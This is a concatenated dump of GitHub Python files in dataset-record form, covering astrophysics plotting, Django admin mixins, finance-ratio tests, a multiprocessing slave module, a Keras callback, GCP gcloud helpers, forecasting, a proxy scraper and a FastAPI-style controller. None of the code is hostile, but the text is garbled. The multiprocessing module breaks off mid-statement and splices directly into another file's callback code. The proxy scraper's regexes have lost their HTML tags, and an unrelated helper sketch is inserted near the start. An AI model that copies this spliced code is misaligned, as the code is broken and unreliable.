$log(Z/Z_{\\\\odot})$\")\n    fig4=plt.figure(4,figsize=plt.figaspect(1))\n    plt.scatter(px,pz , c=pStellarMass,cmap = 'gist_earth', s =2, alpha =0.8)\n    cbar = plt.colorbar()\n    plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n    plt.title(\"StellarMass ($M_{\\odot}$)\")\n    fig5=plt.figure(5,figsize=plt.figaspect(1))\n    plt.scatter(px,pz , c=pAge,cmap = 'gist_earth', s =2, alpha =0.8)\n    cbar = plt.colorbar()\n    plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n    plt.title(\"age (Gyr)\")\n    # TreeIndex\n    fig6=plt.figure(6,figsize=plt.figaspect(1))\n    plt.scatter(px,pz , c=pTreeIndex,cmap = 'gist_earth', s =2, alpha =0.8)\n    cbar = plt.colorbar()\n    plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n    plt.title(\"Tree Index\")\n    #Halo plots\n    #\n\n\n    
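    # A minimal sketch (hypothetical helper, not from this script): the garbled
    # section above builds a shell density profile by hand; Rs/Rho-style arrays
    # could be produced like this. `positions` (N x 3, Mpc), `masses` (Msun) and
    # `center` are assumed inputs; np is the numpy module imported above.
    def radial_density_profile(positions, masses, center, r_max=0.3, n_bins=30):
        r = np.sqrt(np.sum((positions - center) ** 2, axis=1))
        edges = np.linspace(0.0, r_max, n_bins + 1)
        rho = np.zeros(n_bins)
        for i in range(n_bins):
            shell = masses[(r > edges[i]) & (r < edges[i + 1])]
            volume = 4.0 / 3.0 * np.pi * (edges[i + 1] ** 3 - edges[i] ** 3)
            rho[i] = np.sum(shell) / volume
        # Bin centres and the density in each shell, analogous to Rs and Rho.
        return 0.5 * (edges[:-1] + edges[1:]), rho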
plt.show()\n","repo_name":"stalei/TagAnalysis","sub_path":"AccretionV2.py","file_name":"AccretionV2.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73393112051","text":"from functools import wraps\nfrom itertools import chain\n\nfrom django.contrib import messages\nfrom django.contrib.admin import ModelAdmin as BaseModelAdmin\nfrom django.contrib.admin import TabularInline\nfrom django.contrib.admin.utils import unquote\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.db.models.query import QuerySet\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.http.response import HttpResponseBase\nfrom django.urls import re_path, reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import View\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic.list import MultipleObjectMixin\n\n\nclass BaseDjangoObjectActions:\n \"\"\"\n ModelAdmin mixin to add new actions just like adding admin actions.\n\n Attributes\n ----------\n model : django.db.models.Model\n The Django Model these actions work on. This is populated by Django.\n change_actions : list of str\n Write the names of the methods of the model admin that can be used as\n tools in the change view.\n changelist_actions : list of str\n Write the names of the methods of the model admin that can be used as\n tools in the changelist view.\n tools_view_name : str\n The name of the Django Object Actions admin view, including the 'admin'\n namespace. Populated by `_get_action_urls`.\n \"\"\"\n\n change_actions = []\n changelist_actions = []\n tools_view_name = None\n\n # EXISTING ADMIN METHODS MODIFIED\n #################################\n\n def get_urls(self):\n \"\"\"Prepend `get_urls` with our own patterns.\"\"\"\n urls = super().get_urls()\n return self._get_action_urls() + urls\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n extra_context = extra_context or {}\n extra_context.update(\n {\n \"objectactions\": [\n self._get_tool_dict(action) for action in self.get_change_actions(request, object_id, form_url)\n ],\n \"tools_view_name\": self.tools_view_name,\n }\n )\n return super().change_view(request, object_id, form_url, extra_context)\n\n def changelist_view(self, request, extra_context=None):\n extra_context = extra_context or {}\n extra_context.update(\n {\n \"objectactions\": [self._get_tool_dict(action) for action in self.get_changelist_actions(request)],\n \"tools_view_name\": self.tools_view_name,\n }\n )\n return super().changelist_view(request, extra_context)\n\n # USER OVERRIDABLE\n ##################\n\n def get_change_actions(self, request, object_id, form_url):\n \"\"\"\n Override this to customize what actions get to the change view.\n\n This takes the same parameters as `change_view`.\n\n For example, to restrict actions to superusers, you could do:\n\n class ChoiceAdmin(DjangoObjectActions, admin.ModelAdmin):\n def get_change_actions(self, request, **kwargs):\n if request.user.is_superuser:\n return super(ChoiceAdmin, self).get_change_actions(\n request, **kwargs\n )\n return []\n \"\"\"\n return self.change_actions\n\n def get_changelist_actions(self, request):\n \"\"\"\n Override this to customize what actions get to the changelist view.\n \"\"\"\n return self.changelist_actions\n\n # INTERNAL METHODS\n ##################\n\n def 
_get_action_urls(self):\n \"\"\"Get the url patterns that route each action to a view.\"\"\"\n actions = {}\n\n model_name = self.model._meta.model_name\n # e.g.: polls_poll\n base_url_name = f\"{self.model._meta.app_label}_{model_name}\"\n # e.g.: polls_poll_actions\n model_actions_url_name = \"%s_actions\" % base_url_name\n\n self.tools_view_name = \"admin:\" + model_actions_url_name\n\n # WISHLIST use get_change_actions and get_changelist_actions\n # TODO separate change and changelist actions\n for action in chain(self.change_actions, self.changelist_actions):\n actions[action] = getattr(self, action)\n return [\n # change, supports the same pks the admin does\n # https://github.com/django/django/blob/stable/1.10.x/django/contrib/admin/options.py#L555\n re_path(\n r\"^(?P.+)/actions/(?P\\w+)/$\",\n self.admin_site.admin_view( # checks permissions\n ChangeActionView.as_view(\n model=self.model,\n actions=actions,\n back=\"admin:%s_change\" % base_url_name,\n current_app=self.admin_site.name,\n )\n ),\n name=model_actions_url_name,\n ),\n # changelist\n re_path(\n r\"^actions/(?P\\w+)/$\",\n self.admin_site.admin_view( # checks permissions\n ChangeListActionView.as_view(\n model=self.model,\n actions=actions,\n back=\"admin:%s_changelist\" % base_url_name,\n current_app=self.admin_site.name,\n )\n ),\n # Dupe name is fine. https://code.djangoproject.com/ticket/14259\n name=model_actions_url_name,\n ),\n ]\n\n def _get_tool_dict(self, tool_name):\n \"\"\"Represents the tool as a dict with extra meta.\"\"\"\n tool = getattr(self, tool_name)\n standard_attrs, custom_attrs = self._get_button_attrs(tool)\n return dict(\n name=tool_name,\n label=getattr(tool, \"label\", tool_name.replace(\"_\", \" \").capitalize()),\n standard_attrs=standard_attrs,\n custom_attrs=custom_attrs,\n )\n\n def _get_button_attrs(self, tool):\n \"\"\"\n Get the HTML attributes associated with a tool.\n\n There are some standard attributes (class and title) that the template\n will always want. Any number of additional attributes can be specified\n and passed on. This is kinda awkward and due for a refactor for\n readability.\n \"\"\"\n attrs = getattr(tool, \"attrs\", {})\n # href is not allowed to be set. should an exception be raised instead?\n if \"href\" in attrs:\n attrs.pop(\"href\")\n # title is not allowed to be set. should an exception be raised instead?\n # `short_description` should be set instead to parallel django admin\n # actions\n if \"title\" in attrs:\n attrs.pop(\"title\")\n default_attrs = {\n \"class\": attrs.get(\"class\", \"\"),\n \"title\": getattr(tool, \"short_description\", \"\"),\n }\n standard_attrs = {}\n custom_attrs = {}\n for k, v in dict(default_attrs, **attrs).items():\n if k in default_attrs:\n standard_attrs[k] = v\n else:\n custom_attrs[k] = v\n return standard_attrs, custom_attrs\n\n\nclass DjangoObjectActions(BaseDjangoObjectActions):\n pass\n\n\nclass BaseActionView(View):\n \"\"\"\n The view that runs a change/changelist action callable.\n\n Attributes\n ----------\n back : str\n The urlpattern name to send users back to. 
This is set in\n `_get_action_urls` and turned into a url with the `back_url` property.\n model : django.db.model.Model\n The model this tool operates on.\n actions : dict\n A mapping of action names to callables.\n \"\"\"\n\n back = None\n model = None\n actions = None\n current_app = None\n\n @property\n def view_args(self):\n \"\"\"\n tuple: The argument(s) to send to the action (excluding `request`).\n\n Change actions are called with `(request, obj)` while changelist\n actions are called with `(request, queryset)`.\n \"\"\"\n raise NotImplementedError\n\n @property\n def back_url(self):\n \"\"\"\n str: The url path the action should send the user back to.\n\n If an action does not return a http response, we automagically send\n users back to either the change or the changelist page.\n \"\"\"\n raise NotImplementedError\n\n def get(self, request, tool, **kwargs):\n # Fix for case if there are special symbols in object pk\n for k, v in self.kwargs.items():\n self.kwargs[k] = unquote(v)\n\n try:\n view = self.actions[tool]\n except KeyError:\n raise Http404(\"Action does not exist\")\n\n ret = view(request, *self.view_args)\n if isinstance(ret, HttpResponseBase):\n return ret\n\n return HttpResponseRedirect(self.back_url)\n\n # HACK to allow POST requests too\n post = get\n\n def message_user(self, request, message):\n \"\"\"\n Mimic Django admin actions's `message_user`.\n\n Like the second example:\n https://docs.djangoproject.com/en/1.9/ref/contrib/admin/actions/#custom-admin-action\n \"\"\"\n messages.info(request, message)\n\n\nclass ChangeActionView(SingleObjectMixin, BaseActionView):\n @property\n def view_args(self):\n return (self.get_object(),)\n\n @property\n def back_url(self):\n return reverse(self.back, args=(self.kwargs[\"pk\"],), current_app=self.current_app)\n\n\nclass ChangeListActionView(MultipleObjectMixin, BaseActionView):\n @property\n def view_args(self):\n return (self.get_queryset(),)\n\n @property\n def back_url(self):\n return reverse(self.back, current_app=self.current_app)\n\n\ndef takes_instance_or_queryset(func):\n \"\"\"Decorator that makes standard Django admin actions compatible.\"\"\"\n\n @wraps(func)\n def decorated_function(self, request, queryset):\n # func follows the prototype documented at:\n # https://docs.djangoproject.com/en/dev/ref/contrib/admin/actions/#writing-action-functions\n if not isinstance(queryset, QuerySet):\n try:\n # Django >=1.8\n queryset = self.get_queryset(request).filter(pk=queryset.pk)\n except AttributeError:\n try:\n # Django >=1.6,<1.8\n model = queryset._meta.model\n except AttributeError: # pragma: no cover\n # Django <1.6\n model = queryset._meta.concrete_model\n queryset = model.objects.filter(pk=queryset.pk)\n return func(self, request, queryset)\n\n return decorated_function\n\n\ndef action(function=None, *, permissions=None, description=None, label=None, attrs=None):\n \"\"\"\n Conveniently add attributes to an action function:\n\n @action(\n permissions=['publish'],\n description='Mark selected stories as published',\n label='Publish'\n )\n def make_published(self, request, queryset):\n queryset.update(status='p')\n\n This is equivalent to setting some attributes (with the original, longer\n names) on the function directly:\n\n def make_published(self, request, queryset):\n queryset.update(status='p')\n make_published.allowed_permissions = ['publish']\n make_published.short_description = 'Mark selected stories as published'\n make_published.label = 'Publish'\n\n This is the django-object-actions equivalent of\n 
https://docs.djangoproject.com/en/stable/ref/contrib/admin/actions/#django.contrib.admin.action\n \"\"\"\n\n def decorator(func):\n if permissions is not None:\n func.allowed_permissions = permissions\n if description is not None:\n func.short_description = description\n if label is not None:\n func.label = label\n if attrs is not None:\n func.attrs = attrs\n return func\n\n if function is None:\n return decorator\n else:\n return decorator(function)\n\n\nclass GenericRelationAdmin(BaseModelAdmin):\n def formfield_for_foreignkey(self, db_field, request, **kwargs): # noqa\n if db_field.name == \"content_type\":\n if hasattr(self.model, \"BASE_MODEL_ALLOWED\"):\n q_objects = Q()\n for white_class in self.model.BASE_MODEL_ALLOWED:\n q_objects |= Q(**white_class)\n kwargs[\"queryset\"] = ContentType.objects.filter(q_objects)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\nclass ModelAdmin(BaseModelAdmin):\n ordering = (\"-created\",)\n readonly_fields = (\"created\", \"modified\")\n\n # override save_model method to add creator\n def save_model(self, request, obj, form, change):\n user = request.user\n if not obj.pk:\n obj.creator = user\n obj.last_modified_by = user\n super().save_model(request, obj, form, change)\n\n # override save_formset method to add creator\n def save_formset(self, request, form, formset, change):\n super().save_formset(request, form, formset, change)\n for _form in formset:\n if not _form.cleaned_data.get(\"DELETE\", False) and hasattr(_form.instance, \"creator\"):\n instance = _form.instance\n if instance.creator is None:\n instance.creator = request.user\n instance.last_modified_by = request.user\n instance.save()\n\n def get_list_display(self, request):\n list_display = super().get_list_display(request)\n return (\"id\",) + list_display\n\n def get_list_display_links(self, request, list_display):\n \"\"\"\n Return a sequence containing the fields to be displayed as links\n on the changelist. 
The list_display parameter is the list of fields\n returned by get_list_display().\n \"\"\"\n if self.list_display_links or self.list_display_links is None or not list_display:\n return self.list_display_links\n else:\n # Use only the first item in list_display as link\n return list(list_display)[0:2]\n\n\nclass MasterModelAdmin(ModelAdmin):\n date_hierarchy = \"created\"\n readonly_fields = (\"created\", \"modified\", \"creator\", \"last_modified_by\")\n\n def get_fieldsets(self, request, obj=None):\n if obj:\n return (\n (None, {\"fields\": (\"code\", \"name\", \"description\")}),\n (_(\"User Stamped\"), {\"fields\": (\"creator\", \"last_modified_by\")}),\n (_(\"Time Stamped\"), {\"fields\": (\"created\", \"modified\")}),\n )\n else:\n return ((None, {\"fields\": (\"name\", \"code\", \"description\")}),)\n\n def get_readonly_fields(self, request, obj=None):\n readonly_fields = super().get_readonly_fields(request, obj)\n if obj:\n return readonly_fields + (\"code\",) # noqa\n else:\n return readonly_fields\n\n def get_list_display(self, request):\n list_display = super().get_list_display(request)\n return list_display + (\"code\", \"is_active\")\n\n\nclass GenericRelationTabularInline(TabularInline):\n def formfield_for_foreignkey(self, db_field, request, **kwargs): # noqa\n if hasattr(self.model, \"BASE_MODEL_ALLOWED\"):\n q_objects = Q()\n for white_class in self.model.BASE_MODEL_ALLOWED:\n q_objects |= Q(**white_class)\n kwargs[\"queryset\"] = ContentType.objects.filter(q_objects)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n","repo_name":"riso-tech/django-saas","sub_path":"one/utils/contrib/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33099231910","text":"import numpy\nimport pytest\n\nfrom src.measures_ratios import (\n calculate_sharpe_ratio,\n calculate_sortino_ratio,\n)\ndef test_calculate_sharpe_ratio():\n \"\"\"\n Test the calculate_sharpe_ratio function.\n \n This test checks the function's output against an expected value using predefined inputs.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n volatility = 0.15\n expected = (mean_return - rf) / volatility\n assert calculate_sharpe_ratio(mean_return, volatility, rf) == pytest.approx(expected, 1e-15)\n\ndef test_calculate_sortino_ratio():\n \"\"\"\n Test the calculate_sortino_ratio function.\n \n This test checks the function's output against expected values for both \n a zero downside standard deviation and a non-zero value.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n downside_std = 0.15\n if downside_std == 0:\n assert calculate_sortino_ratio(mean_return, downside_std, rf) is numpy.NaN\n else:\n expected = (mean_return - rf) / downside_std\n assert calculate_sortino_ratio(mean_return, downside_std, rf) == pytest.approx(expected, 1e-15)\n\ndef test_sharpe_ratio_invalid_input():\n \"\"\"\n Test the calculate_sharpe_ratio function with invalid inputs.\n \"\"\"\n with pytest.raises(TypeError):\n calculate_sharpe_ratio(\"string\", 0.2, 0.02)\n\ndef test_sortino_ratio_edge_cases():\n \"\"\"\n Test the calculate_sortino_ratio function for edge cases.\n \n Specifically, this test checks the function's behavior when the downside standard deviation is zero.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n assert calculate_sortino_ratio(mean_return, 0, rf) is 
numpy.NaN","repo_name":"wasimnoordin/EntroPy","sub_path":"tests/test_measures_ratios.py","file_name":"test_measures_ratios.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41093511101","text":"#!/usr/bin/env python\nfrom Bio import SeqIO\nfrom itertools import compress\nimport argparse\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description='Filter a genome based on a set of given clusters',\n\t\t\t\t epilog=\"Developed by Simón Villanueva Corrales @sivico26\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('-i', '--input', type=str,\n help='Path to genome input')\n parser.add_argument('-d', '--dat', type=str,\n help='Path to clusters file(.dat)')\n parser.add_argument('-c', '--clusters', type=int, nargs='+',\n help='Spaced list of clusters to be included')\n parser.add_argument('-o', '--output', type=str, default=\"genome_filt.fasta\" ,\n help='Path to put output genome [%(default)s]')\n parser.add_argument('-f', '--format', type=str, default=\"fasta\", metavar=\"STR\",\n help='Input file format [%(default)s]')\n args = parser.parse_args()\n return args\n\n\ndef filt_clust(genoma, clust_list, clusters):\n index_list = [True if int(line.split()[0]) in clusters else False for line in clust_list]\n return compress(genoma, index_list)\n\ndef main():\n args = get_arguments()\n genome = list(SeqIO.parse(args.input, args.format))\n with open(args.dat,\"r\") as file:\n clust_list = file.readlines()\n genome_filt = filt_clust(genome, clust_list,args.clusters)\n SeqIO.write(genome_filt, args.output, args.format)\n\nif __name__ == '__main__':\n main()\n","repo_name":"sivico26/Bioinfo_errands","sub_path":"Scripts/clust_filt.py","file_name":"clust_filt.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27158428781","text":"from nnoir.functions import *\nfrom .utils import *\n\n\nclass OpSoftmax(Op):\n\n def __init__(self, node, *args):\n super(OpSoftmax, self).__init__(node, *args)\n\n self.axis = 1\n for attr in self.node.attribute:\n if attr.name == 'axis':\n self.axis = attr.i\n\n def to_function(self, env, constants):\n return [\n Softmax(\n list(self.node.input),\n list(self.node.output),\n axis=self.axis\n )\n ]\n","repo_name":"lflyme/nnoir","sub_path":"nnoir-onnx/nnoir_onnx/operators/softmax.py","file_name":"softmax.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"27840964995","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ntry:\n from . 
import slave\nexcept:\n import slave\n\nimport os\nimport sys\nfrom subprocess import Popen\nimport subprocess\nimport pickle\nimport datetime\nfrom queue import Queue\nfrom threading import Thread\nimport time\nimport tempfile\nimport random\nimport string\nimport hashlib\nimport signal\nimport numpy as np\nimport __main__\nimport tempfile\n\n#path = os.getcwd().replace('\\\\', '/') #uncomment to save to active folder\nTMP_PATH = tempfile.gettempdir()\n\nMIN_TIME = 1\n\nclass Parallel():\n \"\"\"creates the slaves\"\"\"\n def __init__(self, max_nodes, run_parallel, callback_active):\n \"\"\"module is a string with the name of the modulel where the\n functions you are going to run are \"\"\"\n if max_nodes is None:\n self.cpu_count=os.cpu_count()\n else:\n self.cpu_count=max_nodes\n self.callback_active = callback_active\n n=self.cpu_count\n self.kill_warned = False\n self.is_parallel = run_parallel\n #directely in the simplest way, without any layers or multiprocessing (for debugging).\n\n self.dict_file = create_temp_files(self.cpu_count)\n self.slaves=[Slave(run_parallel, n) for i in range(n)]\n self.final_results = {}\n self.n_tasks = {}\n self.t = time.time()\n self.pids = []\n self.master_pid = os.getpid()\n self.sum_running = {}\n for i in range(n):\n self.slaves[i].confirm(i) \n pid=str(self.slaves[i].p_id)\n if int(i/5.0)==i/5.0:\n pid='\\n'+pid\n self.pids.append(pid)\n pstr=\"\"\"Multi core processing enabled using %s cores. \\n\nMaster PID: %s \\n\nSlave PIDs: %s\"\"\" %(n, self.master_pid,', '.join(self.pids))\n print (pstr)\n\n def send_dict(self, d):\n f = open(self.dict_file, 'wb')\n pickle.dump(d, f) \n f.close()\n r = []\t\t\n return self.async_send_receive('transfer dictionary', self.dict_file)\n\n\n def exec(self, tasks, name):\n #Handles at most as many tasks as cpus for the moment\n if tasks is None:\n tasks = [None]*self.cpu_count\n if type(tasks)==str:\n tasks = [tasks]*self.cpu_count\n self.n_tasks[name] = len(tasks)\n self.final_results[name] = [None]*self.n_tasks[name]\n self.sum_running[name] = len(tasks)\n return self.async_send_receive(name, tasks)\n\n def callback(self, name, outbox = {}, s_id = None, collect_finnished_procs = True):\n if not self.callback_active:\n return [{}]*self.cpu_count\n d=[]\n sumrun = -1\n while time.time() - self.t self.best_val_acc:\n self.best_val_acc = val_acc\n self.model.save_weights(self.model_path)\n # test_acc = evaluate(self.test_generator,self.model.predict)\n print(\n u'val_acc: %.5f, best_val_acc: %.5f\\n' %\n (val_acc, self.best_val_acc)\n )\n\n def on_train_end(self, logs=None):\n if self.test_generator:\n test_acc = evaluate(self.test_generator, self.model.predict)\n print(\n u'best_val_acc: %.5f, test_acc: %.5f\\n' %\n (self.best_val_acc, test_acc)\n )\n","repo_name":"leefsir/Text_Classification","sub_path":"utils/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":8713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19012530347","text":"#! 
/usr/bin/env python\n## -*- Mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8; -*-\n#\nfrom subprocess import Popen, PIPE, STDOUT\nimport time\nimport os\nimport datetime\nfrom threading import Thread, Lock\nfrom Queue import Queue\n\n\ndef h_r(quantity, multiple=1024):\n if quantity == 0:\n quantity = +0\n SUFFIXES = [\"B\"] + [i + {1000: \"B\", 1024: \"iB\"}[multiple] for i in \"KMGTPEZY\"]\n for suffix in SUFFIXES:\n if quantity < multiple or suffix == SUFFIXES[-1]:\n if suffix == SUFFIXES[0]:\n return \"%d%s\" % (quantity, suffix)\n else:\n return \"%.1f%s\" % (quantity, suffix)\n else:\n quantity /= multiple\n\ndef niceTime(t):\n return str(datetime.timedelta(seconds=int(t)))\n\n\n\n\n\n\nclass Worker(Thread):\n \"\"\"This is the main worker - it will process jobs as long as the \"job\n queue\" has jobs available.\n \"\"\"\n # this lock is used to avoid messing up the screen output - only\n # one worker will write to screen at a given time. It is\n # technically a Mutual Exclusion (mutex)\n screen_mutex = Lock()\n\n def __init__(self, queue, file):\n # initialize the base class\n super(Worker, self).__init__()\n self.queue = queue\n self.file=file\n self.envviron=os.environ\n self.envviron[\"LD_LIBRARY_PATH\"]=\".:../:../../ns-3.14/build/\"\n\n def log(self, message):\n Worker.screen_mutex.acquire() \n print(\"{timestamp:%d-%b-%Y %H:%M:%S.%f UTC} \"\n \"{name}: {message}\".format(timestamp=datetime.datetime.utcnow(),\n name=self.getName(),\n message=message))\n if(message):\n self.file.write(message)\n self.file.flush()\n \n Worker.screen_mutex.release()\n\n def run(self):\n while True:\n job = self.queue.get()\n before = time.time()\n args1=\"%s\" %(job['num'])\n \n p = Popen(['./testtos',args1], stdout=PIPE, stderr=STDOUT,env=self.envviron)\n stdout, stderr = p.communicate()\n after = time.time()\n\n if(stdout):\n msg = \"%s\" %(stdout)\n self.log(msg)\n \n if stderr:\n msg = \"STERR: %s\" %(stderr)\n self.log(msg)\n \n# msg = \"Finished run with = %s open libs running time %s\" \\\n# %(job['num'],niceTime(after-before))\n# self.log(msg)\n\n # when the job is done, you signal the queue - refer to\n # the Queue module documentation\n self.queue.task_done()\n\n\ndef main(number_of_workers):\n runtime=2300\n incr = 100\n number_of_jobs=int((runtime)/incr)\n queue = Queue() \n statinfo = os.stat(\"libtosblink.so\") \n run_log = \"SUMMARY.EFL-TESTS.%s.LOG\" %h_r(statinfo.st_size) \n runLog = open(run_log,'w')\n\n for _ in range(number_of_workers):\n worker = Worker(queue,runLog)\n worker.daemon = True \n worker.start()\n\n\n for _ in range(number_of_jobs):\n args={'num':_*incr}\n queue.put(args)\n \n\n queue.join()\n runLog.close() \n\nif __name__ == \"__main__\":\n import multiprocessing\n # call main \n main(5)\n","repo_name":"Northshoot/symphony","sub_path":"elf/tos/test-runner.py","file_name":"test-runner.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40541504182","text":"import logging\nimport os\nimport subprocess\nfrom collections.abc import Collection\nfrom threading import Thread\n\nlogger = logging.getLogger(__name__)\n\nAUTHENTICATION_COMMAND = \"gcloud auth activate-service-account --key-file=%s\"\nSET_PROPERTY_PROJECT = \"gcloud config set project %s\"\nMACHINE_STARTING_COMMAND = \"gcloud compute instances start %s --zone=%s\"\nMACHINE_STOPPING_COMMAND = \"gcloud compute instances stop %s --zone=%s\"\n\n# Key path location relative to this file's 
directory\nRELATIVE_KEY_PATH = \"../../gcp_keys/gcp_key.json\"\nDEFAULT_PROJECT = \"guardicore-22050661\"\n\n\ndef initialize_gcp_client():\n abs_key_path = get_absolute_key_path()\n\n subprocess.call(get_auth_command(abs_key_path), shell=True) # noqa: DUO116\n logger.info(\"GCP Handler passed key\")\n\n subprocess.call(get_set_project_command(DEFAULT_PROJECT), shell=True) # noqa: DUO116\n logger.info(\"GCP Handler set project\")\n logger.info(\"GCP Handler initialized successfully\")\n\n\ndef get_absolute_key_path() -> str:\n file_dir = os.path.dirname(os.path.realpath(__file__))\n absolute_key_path = os.path.join(file_dir, RELATIVE_KEY_PATH)\n absolute_key_path = os.path.realpath(absolute_key_path)\n\n if not os.path.isfile(absolute_key_path):\n raise FileNotFoundError(\n \"GCP key not found. \" \"Add a service key to envs/monkey_zoo/gcp_keys/gcp_key.json\"\n )\n return absolute_key_path\n\n\ndef start_machines(machine_list: dict[str, Collection[str]]):\n \"\"\"\n Start all the machines in the list.\n :param machine_list: A dictionary with zone and machines per zone.\n \"\"\"\n logger.info(\"Setting up all GCP machines...\")\n try:\n run_gcp_command(MACHINE_STARTING_COMMAND, machine_list)\n logger.info(\"GCP machines successfully started.\")\n except Exception as e:\n logger.error(\"GCP Handler failed to start GCP machines: %s\" % e)\n raise e\n\n\ndef stop_machines(machine_list: dict[str, Collection[str]]):\n try:\n run_gcp_command(MACHINE_STOPPING_COMMAND, machine_list)\n logger.info(\"GCP machines stopped successfully.\")\n except Exception as e:\n logger.error(\"GCP Handler failed to stop network machines: %s\" % e)\n\n\ndef get_auth_command(key_path):\n return AUTHENTICATION_COMMAND % key_path\n\n\ndef get_set_project_command(project):\n return SET_PROPERTY_PROJECT % project\n\n\ndef _run_gcp_command(gcp_command: str, machine_list: Collection[str], zone: str):\n \"\"\"Runs the command in the given zone\"\"\"\n ret = subprocess.run( # noqa DUO116\n (gcp_command % (\" \".join(machine_list), zone)),\n stderr=subprocess.PIPE,\n stdout=subprocess.PIPE,\n shell=True,\n )\n if ret.returncode != 0:\n raise Exception(f\"Failed starting GCP machines: {ret.stderr.decode()}\")\n\n\ndef run_gcp_command(gcp_command: str, machine_list: dict[str, Collection[str]]):\n command_threads = [\n Thread(target=_run_gcp_command, args=(gcp_command, machine_list[zone], zone))\n for zone in machine_list\n ]\n for thread in command_threads:\n thread.start()\n for thread in command_threads:\n thread.join()\n","repo_name":"guardicore/monkey","sub_path":"envs/monkey_zoo/blackbox/utils/gcp_machine_handlers.py","file_name":"gcp_machine_handlers.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":6367,"dataset":"github-code","pt":"21"} +{"seq_id":"19359177113","text":"import os\nfrom forecast_deepar import ForecastDeepAR\nfrom forecast_holtwinters import ForecastHoltWinters\nfrom forecast_lgb import ForecastLGB\nfrom supply_chain import SupplyChain\nimport pandas as pd\n\ndef main():\n if not os.path.exists('../data/forecast'):\n os.mkdir('../data/forecast')\n if not os.path.exists('../data/submit'):\n os.mkdir('../data/submit')\n holt_winters=ForecastHoltWinters()\n holt_winters.run()\n lgb=ForecastLGB()\n lgb.run()\n deepar=ForecastDeepAR()\n deepar.run()\n supply_chain1 = SupplyChain(2.5, '../data/forecast/holtwinters_result.csv')\n supply_chain1.run()\n supply_chain2 = SupplyChain(1, '../data/forecast/lgb80_result.csv')\n supply_chain2.run()\n supply_chain3 = 
SupplyChain(2.5, '../data/forecast/deepar_result_mean.csv')\n supply_chain3.run()\n supply_chain4 = SupplyChain(1, '../data/forecast/deepar_result_80.csv')\n supply_chain4.run()\n result_df_list = []\n for result in os.listdir('../data/submit'):\n result_df = pd.read_csv(f'../data/submit/{result}')\n result_df_list.append(result_df)\n merge_result = result_df.copy()[['unit', 'ts', 'qty']]\n merge_result['qty'] = 0\n for result_df in result_df_list:\n merge_result['qty'] += result_df['qty']\n merge_result['qty'] = merge_result['qty'] / len(result_df_list)\n merge_result.to_csv('../submit/submit.csv')\n\nif __name__ == '__main__':\n main()","repo_name":"Uroboros0313/Tianchi_SupplyChain","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"31669168644","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nfrom proxy_pool.items import ProxyPoolItem\n\n\nclass XicidailiSpider(scrapy.Spider):\n name = 'xicidaili'\n allowed_domains = ['xicidali.com']\n start_urls = ['http://www.xicidaili.com/']\n\n def parse(self, response):\n ips = re.findall('(\\d+\\.\\d+\\.\\d+\\.\\d+)', response.text)\n ports = re.findall('(\\d+)', response.text)\n types = re.findall('([^<]+)', response.text)\n protocols = re.findall('(HTTPS?)', response.text)\n for ip, port, _type, protocol in zip(ips, ports, types, protocols):\n yield ProxyPoolItem({\n 'ip': ip,\n 'protocol': protocol,\n 'port': port,\n 'types': _type\n })\n","repo_name":"jiazone/proxy_pool","sub_path":"proxy_pool/spiders/xicidaili.py","file_name":"xicidaili.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14117461943","text":"from entity.pokemon import PokemonEntity\n\nfrom service.pokemon import pokemon_service\n\n\nclass PokemonController:\n\n async def get_pokemons(self):\n results = await pokemon_service.get_all()\n return {\"message\": \"Get all pokemons\", \"pokemons\": results}\n\n async def get_pokemon_by_id(self, id: int):\n result = await pokemon_service.find_by_id(id)\n return {\"message\": \"Get one pokemon by ID\", \"result\": result}\n\n async def get_pokemon_by_name(self, name: str):\n result = await pokemon_service.find_by_name(name)\n return {\"message\": \"Get one pokemon by NAME\", \"result\": result}\n\n async def create_pokemon(self, pokemon: PokemonEntity):\n await pokemon_service.create(pokemon)\n return {\"message\": \"✅Create a new pokemon\", \"pokemon\": pokemon}\n\n async def update_pokemon(self, pokemon: PokemonEntity):\n updated = await 